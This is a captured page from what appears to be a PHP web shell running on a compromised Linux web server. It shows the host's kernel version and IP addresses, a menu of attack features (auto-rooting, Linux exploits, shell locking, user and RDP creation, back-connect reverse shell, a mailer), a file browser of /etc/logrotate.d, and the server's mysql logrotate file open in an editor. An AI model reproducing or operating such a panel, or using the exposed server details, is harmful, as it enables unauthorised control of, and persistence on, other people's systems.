Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
logrotate.d /
[ HOME SHELL ]
Name
Size
Permission
Action
apache
195
B
-rw-r-----
bootlog
91
B
-rw-r--r--
chrony
160
B
-rw-r--r--
dpkg
112
B
-rw-r--r--
ea-php56-php-fpm
257
B
-rw-r--r--
ea-php70-php-fpm
257
B
-rw-r--r--
ea-php71-php-fpm
257
B
-rw-r--r--
ea-php72-php-fpm
257
B
-rw-r--r--
ea-php73-php-fpm
257
B
-rw-r--r--
ea-php74-php-fpm
257
B
-rw-r--r--
ea-php80-php-fpm
257
B
-rw-r--r--
ea-php81-php-fpm
257
B
-rw-r--r--
exim
405
B
-rw-r--r--
firewalld
93
B
-rw-r--r--
iptraf-ng
138
B
-rw-r--r--
lfd
172
B
-rw-r--r--
modsecurity_logs
277
B
-rw-r--r--
mysql
892
B
-rw-r--r--
named
514
B
-rw-r-----
nginx
261
B
-rw-r--r--
nscd_logs
180
B
-rw-r--r--
redis
127
B
-rw-r--r--
sulsphp_log
276
B
-rw-r--r--
supervisor
98
B
-rw-r--r--
syslog
224
B
-rw-r--r--
wpa_supplicant
100
B
-rw-r--r--
yum
103
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mysql
# This logname can be set in /etc/my.cnf # by setting the variable "log-error" # in the [mysqld] section as follows: # # [mysqld] # log-error=/var/lib/mysql/mysqld.log # # If the root user has a password you have to create a # /root/.my.cnf configuration file with the following # content: # # [mysqladmin] # password = <secret> # user= root # # where "<secret>" is the password. # # ATTENTION: This /root/.my.cnf should be readable ONLY # for root ! /var/lib/mysql/mysqld.log { # create 600 mysql mysql su mysql mysql notifempty daily rotate 3 missingok compress postrotate # just if mysqld is really running if test -x /usr/bin/mysqladmin && \ /usr/bin/mysqladmin ping &>/dev/null then /usr/bin/mysqladmin --local flush-error-log \ flush-engine-log flush-general-log flush-slow-log fi endscript }
Close